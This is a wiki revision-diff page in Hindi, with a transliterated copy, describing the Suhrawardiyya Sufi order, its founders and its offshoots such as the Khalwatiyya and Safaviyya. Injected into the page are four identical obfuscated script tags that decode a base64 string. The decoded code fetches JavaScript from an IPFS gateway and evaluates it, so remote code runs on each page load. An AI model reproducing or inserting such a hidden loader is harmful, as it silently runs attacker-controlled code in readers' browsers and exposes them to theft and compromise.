Difference between revisions of "सुहरावर्दिया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''सुहरावर्दिया''' रहस्यवादियों (सूफ़ियों) का एक मुस्ल...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
'''सुहरावर्दिया''' रहस्यवादियों (सूफ़ियों) का एक मुस्लिम 'सिलसिला' (किसी बड़े महात्मा के शिष्यों का अनुक्रम) है, जो अपने आध्यात्मिक अनुशासन की कठोरता के लिए जाना जाता है। इसे [[बग़दाद]] में अबू नजीब अस्-सुहरावर्दी द्वारा स्थापित किया गया था और इसके बाद उनके भानजे उमर अस्-सुहरावर्दी ने इसे आगे बढ़ाया।
+
'''सुहरावर्दिया''' रहस्यवादियों (सूफ़ियों) का एक [[मुस्लिम]] 'सिलसिला' (किसी बड़े महात्मा के शिष्यों का अनुक्रम) है, जो अपने आध्यात्मिक अनुशासन की कठोरता के लिए जाना जाता है। इसे [[बग़दाद]] में 'अबू नजीब अस्-सुहरावर्दी' द्वारा स्थापित किया गया था और इसके बाद उनके भानजे 'उमर अस्-सुहरावर्दी' ने इसे आगे बढ़ाया।
  
*सिलसिले की रस्मी प्रार्थनाएँ (ज़िक्र) से जुड़े ख़ुदा के सात नामों के हज़ारों जपों पर आधारित हैं।
+
*सिलसिले की रस्मी प्रार्थनाओं (ज़िक्र) से जुड़े ख़ुदा के सात नाम हज़ारों जपों पर आधारित हैं।
 
*ये सात सूक्ष्म [[आत्मा|आत्माओं]] (लताइफ़ सबा) और सात रोशनियों से संबद्ध है।
 
*ये सात सूक्ष्म [[आत्मा|आत्माओं]] (लताइफ़ सबा) और सात रोशनियों से संबद्ध है।
 
*मुख्य सिलसिला [[अफ़ग़ानिस्तान]] और भारतीय उपमहाद्वीप में केन्द्रित हो गया था।
 
*मुख्य सिलसिला [[अफ़ग़ानिस्तान]] और भारतीय उपमहाद्वीप में केन्द्रित हो गया था।

Revision as of 11:10, 17 November 2011

suharavardiya rahasyavadiyoan (soofiyoan) ka ek muslim 'silasila' (kisi b de mahatma ke shishyoan ka anukram) hai, jo apane adhyatmik anushasan ki kathorata ke lie jana jata hai. ise bagadad mean 'aboo najib ash-suharavardi' dvara sthapit kiya gaya tha aur isake bad unake bhanaje 'umar ash-suharavardi' ne ise age badhaya.

  • silasile ki rasmi prarthanaoan (zikr) se ju de khuda ke sat nam hazaroan japoan par adharit haian.
  • ye sat sookshm atmaoan (lataif saba) aur sat roshaniyoan se sanbaddh hai.
  • mukhy silasila afaganistan aur bharatiy upamahadvip mean kendrit ho gaya tha.
  • is silasile ki any shakhaean bad mean pashchim ki or badhian.
  • eeran mean ‘umar ul khalvati’ dvara sthapit paramparavadi khalvatiya bhi kathoratapoorvak anushasit tha.
  • yah bad mean turki aur misr se bhi kee shakhaoan mean bant gaya aur phaila.
  • aradabil, eeran mean safuddin dvara sangathit safaviya ne eerani safavi vansh (1502-1736 ee.) aur kee turki shakhaoan ko janm diya, jo 16vian sadi ki shuruat mean aautoman shasakoan ke viruddh sakriy the.
  • aljiriyaee rahamaniya 18vian sadi ke doosare bhag mean khalvatiya se vikasit hua, jab isake sansthapak ‘abd ar-rahaman al-gushtuli’ khalvati shraddha ka kendr ban ge.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>